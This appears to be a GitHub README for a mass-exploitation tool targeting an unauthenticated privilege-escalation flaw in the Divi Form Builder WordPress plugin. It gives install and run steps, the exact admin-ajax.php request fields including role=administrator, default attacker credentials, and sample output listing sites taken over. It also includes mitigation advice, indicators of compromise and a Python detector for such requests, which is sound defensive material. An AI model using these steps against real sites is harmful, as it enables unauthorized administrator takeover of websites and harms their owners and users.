Jenderal92/CVE-2026-5118
# Divi Form Builder <= 5.1.2 - Unauthenticated Privilege Escalation via 'role'
## Overview
This Python 2 script exploits an unauthenticated privilege escalation vulnerability in the **Divi Form Builder** WordPress plugin, versions 5.1.2 and earlier (and related Divi forms). It lets a remote, unauthenticated attacker register an **administrator** account by:
- Extracting the `fb_nonce` from the target's Divi registration form.
- Sending a crafted `multipart/form-data` request to `/wp-admin/admin-ajax.php` with `role=administrator`.
- Detecting success from the response and saving the resulting admin URL and credentials to an output file.
## Requirements
- **Python 2.7** (uses `urllib2`, `Queue`, `threading` – not compatible with Python 3 without modifications)
- A list of target URLs (one per line)
## Installation
```bash
git clone https://github.com/Jenderal92/CVE-2026-5118.git
cd CVE-2026-5118
chmod +x CVE-2026-5118.py
```
## Usage
### 1. Prepare target list
Create a text file with one domain or URL per line. You can omit `http://` / `https://` – the script will add `https://` by default.
**Example `targets.txt`:**
```
example.com
https://vulnerable-site.com
http://127.0.0.1/wordpress
test-site.org
```
### 2. Run the exploit
```bash
python CVE-2026-5118.py targets.txt
```
### 3. Output example
```
[*] Total targets : 4
[*] Credentials : Attacker / Attacker@123#+
[*] Threads : 20
[*] Output file : results.txt
[1] Checking https://example.com
[+] SUCCESS! https://example.com/wp-admin/
[2] Checking https://vulnerable-site.com
[+] SUCCESS! https://vulnerable-site.com/wp-admin/
[3] Checking http://127.0.0.1/wordpress
[3] FAILED http://127.0.0.1/wordpress
[4] Checking https://test-site.org
[4] FAILED https://test-site.org
=== DONE ===
Successful: 2 / 4
```
### 4. Results file (`results.txt`)
```
https://example.com/wp-admin/|Attacker|Attacker@123#+
https://vulnerable-site.com/wp-admin/|Attacker|Attacker@123#+
```
## Configuration
You can customise the following variables at the top of the script:
| Variable | Default | Description |
|----------|---------|-------------|
| `DEFAULT_USERNAME` | `Attacker` | Username to register |
| `DEFAULT_PASSWORD` | `Attacker@123#+` | Password for the registered account (the default mixes case, digits and special characters) |
| `DEFAULT_EMAIL` | `mail@admin.com` | Email address |
| `THREAD_COUNT` | `20` | Number of concurrent threads |
| `OUTPUT_FILE` | `results.txt` | File to save successful targets |
## How It Works
1. **Normalise URL** – adds `https://` if no scheme is provided.
2. **Extract nonce** – fetches the homepage (or registration page) and searches the HTML for the `fb_nonce` value using regex patterns.
3. **Build request** – constructs a `multipart/form-data` POST containing:
- `action=de_fb_ajax_submit_ajax_handler`
- `fb_nonce=<value extracted in step 2>`
- `role=administrator`
- `de_fb_user_login` / `user_login`
- `de_fb_user_pass` / `user_pass`
- `de_fb_user_email` / `user_email`
4. **Send to admin‑ajax.php** – if the response body contains any of the script's success keywords, the target is marked as vulnerable. A keyword match is only a heuristic, so confirm a reported success by logging in with the saved credentials before relying on it.
5. **Save result** – writes the admin URL and credentials to the output file in `url|username|password` form.
## Detection & Mitigation
**For WordPress administrators using Divi:**
- Update Divi Form Builder to a version later than 5.1.2, and keep Divi and all associated plugins current.
- Disable public registration if it is not needed.
- Use a security plugin (Wordfence, Sucuri) or a WAF to monitor and rate-limit `admin-ajax.php` requests.
- Add reCAPTCHA to registration forms, but note that it only helps if the AJAX handler verifies the CAPTCHA server-side: the script never renders the form and posts straight to `admin-ajax.php`.
- Never let a registration form accept a client-supplied `role` parameter; the role must be assigned server-side (for example from the `default_role` option), and any `role` field in the request should be ignored.
**Indicators of compromise (IOCs):**
- POST requests to `admin-ajax.php` carrying `action=de_fb_ajax_submit_ajax_handler` together with a `role` parameter, especially `role=administrator`. The script sends both in a `multipart/form-data` body, so they do not appear in a standard access log that records only the request line; you need a WAF or ModSecurity audit log, or application-level request logging that captures POST bodies.
- New administrator users that no existing admin created. The default username is `Attacker` and the default e-mail `mail@admin.com`, but both are configurable (see Configuration), so review every account whose `wp_capabilities` includes `administrator` against the expected list rather than matching the default name.
- A `user_registered` timestamp on such an account that coincides with an `admin-ajax.php` POST for the action above from an unfamiliar IP address.
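The following is an added example, not code from the repository or from the Divi Form Builder plugin, that ties the request described under "How It Works" to the IOCs above. It builds a request of the shape the script sends (using only the field and action names listed on this page; the nonce, boundary and sample values are constructed placeholders), parses `multipart/form-data` and urlencoded bodies, and flags any call to the vulnerable action that carries a client-supplied `role` above `subscriber`. The request records are hand-constructed to resemble what a WAF or ModSecurity audit log captures; the record layout is an assumption of this example, not a real log format.

```python
"""Detect Divi Form Builder role-escalation requests in captured HTTP records.

Added example for this README; not the exploit script itself.  Record layout,
nonce, boundary and sample values are constructed for offline use.
"""
import re
from urllib.parse import parse_qs, urlparse

# Identifiers taken from the "How It Works" section of the README.
VULN_ACTION = "de_fb_ajax_submit_ajax_handler"
AJAX_PATH = "/wp-admin/admin-ajax.php"
# Roles a public registration form may legitimately assign; any other role
# supplied by the client is treated as an escalation attempt.
LOW_PRIV_ROLES = {"subscriber"}


def build_multipart_body(fields: dict, boundary: str) -> bytes:
    """Serialise fields as multipart/form-data (used to construct samples)."""
    parts = []
    for name, value in fields.items():
        parts.append(
            f"--{boundary}\r\nContent-Disposition: form-data; name=\"{name}\"\r\n\r\n{value}\r\n"
        )
    parts.append(f"--{boundary}--\r\n")
    return "".join(parts).encode()


def parse_multipart_body(body: bytes, boundary: str) -> dict:
    """Minimal multipart/form-data parser returning {field_name: value}."""
    fields = {}
    delimiter = b"--" + boundary.encode()
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b"--"):  # "--boundary--" closes the body
            break
        head, _, value = chunk.partition(b"\r\n\r\n")
        match = re.search(rb'name="([^"]+)"', head)
        if match:
            fields[match.group(1).decode()] = value.rstrip(b"\r\n").decode("utf-8", "replace")
    return fields


def request_params(req: dict) -> dict:
    """Merge query-string and body parameters of one captured request.

    Body values override query values, mirroring PHP's default
    request_order="GP" (POST wins over GET) that admin-ajax.php relies on.
    """
    params = {k: v[-1] for k, v in parse_qs(urlparse(req["url"]).query).items()}
    ctype = req.get("content_type", "")
    body = req.get("body", b"")
    if body and ctype.startswith("multipart/form-data"):
        match = re.search(r'boundary="?([^";]+)"?', ctype)
        if match:
            params.update(parse_multipart_body(body, match.group(1)))
    elif body and ctype.startswith("application/x-www-form-urlencoded"):
        params.update({k: v[-1] for k, v in parse_qs(body.decode("utf-8", "replace")).items()})
    return params


def classify(req: dict) -> dict:
    """Return a verdict dict for one request; 'alert' is None when benign."""
    params = request_params(req)
    path = urlparse(req["url"]).path
    verdict = {"path": path, "action": params.get("action"), "role": params.get("role"), "alert": None}
    if not path.endswith(AJAX_PATH) or verdict["action"] != VULN_ACTION:
        return verdict  # not the vulnerable handler at all
    role = verdict["role"]
    if role is None:
        verdict["alert"] = "info: Divi form submission without a role field"
    elif role.lower() in LOW_PRIV_ROLES:
        verdict["alert"] = f"low: client-supplied role={role} (should be ignored server-side)"
    else:
        verdict["alert"] = f"high: privilege-escalation attempt, role={role}"
    return verdict


def scan(requests: list) -> list:
    """Return only the verdicts whose alert is high severity."""
    return [v for v in map(classify, requests) if v["alert"] and v["alert"].startswith("high")]


# --- Constructed sample records (placeholders, not captured traffic) -------
BOUNDARY = "----exampleboundary"
EXPLOIT_FIELDS = {  # the field set the README says the script sends
    "action": VULN_ACTION,
    "fb_nonce": "0123456789",  # placeholder; the script scrapes the real one
    "role": "administrator",
    "de_fb_user_login": "Attacker",
    "de_fb_user_pass": "Attacker@123#+",
    "de_fb_user_email": "mail@admin.com",
}
SAMPLE_REQUESTS = [
    {  # 1: the shape the script sends (multipart body, role inside it)
        "url": "https://example.com/wp-admin/admin-ajax.php",
        "content_type": f"multipart/form-data; boundary={BOUNDARY}",
        "body": build_multipart_body(EXPLOIT_FIELDS, BOUNDARY),
    },
    {  # 2: action in the query string, urlencoded body, a lesser role
        "url": "http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=" + VULN_ACTION,
        "content_type": "application/x-www-form-urlencoded",
        "body": b"fb_nonce=0123456789&role=editor&user_login=bob&user_pass=x&user_email=bob%40example.com",
    },
    {  # 3: ordinary visitor submitting the form, no role field
        "url": "https://example.com/wp-admin/admin-ajax.php",
        "content_type": "application/x-www-form-urlencoded",
        "body": b"action=" + VULN_ACTION.encode() + b"&fb_nonce=0123456789&user_login=alice&user_pass=y&user_email=a%40example.com",
    },
    {  # 4: unrelated admin-ajax traffic
        "url": "https://example.com/wp-admin/admin-ajax.php",
        "content_type": "application/x-www-form-urlencoded",
        "body": b"action=heartbeat&_nonce=abc",
    },
]

if __name__ == "__main__":
    for verdict in map(classify, SAMPLE_REQUESTS):
        print(verdict["alert"] or "no alert", verdict["path"])
```

The point of parsing the multipart body is that a detector which only reads the query string or urlencoded bodies never sees the `role` field the script sends; records 1 and 2 are flagged high, record 3 is only informational, and record 4 is ignored.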
## Legal Disclaimer
This software is provided for **educational purposes** and **authorised security testing only**. The author assumes no liability for misuse or damage caused by this tool. By using this software, you agree to:
- Obtain **written permission** from the system owner before testing.
- Comply with all applicable laws (CFAA, Computer Misuse Act, UU ITE, etc.).
- Immediately remove any unauthorised access that is obtained.
- Report vulnerabilities responsibly to the affected vendor.
**Violating these terms may result in criminal prosecution, fines, or imprisonment.**